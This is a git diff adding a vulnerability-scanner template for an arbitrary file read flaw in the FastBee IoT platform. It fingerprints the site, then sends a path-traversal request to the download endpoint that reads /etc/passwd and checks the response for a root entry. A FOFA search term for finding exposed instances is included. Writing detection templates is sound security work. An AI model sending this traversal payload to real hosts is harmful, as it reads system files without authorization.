diff --git a/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml b/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml
new file mode 100644
index 0000000000..56d6a8804e
--- /dev/null
+++ b/http/vulnerabilities/other/fastbee-arbitrary-file-read.yaml
@@ -0,0 +1,53 @@
+id: fastbee-arbitrary-file-read
+
+info:
+  name: FastBee - Local File Inclusion
+  author: s4e-io
+  severity: high
+  description: |
+    Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
+  reference:
+    - https://blog.csdn.net/weixin_43167326/article/details/141806542
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fastbee
+    product: fastbee
+    fofa-query: "fastbee"
+  tags: fastbee,iot,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"<title>FastBee")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200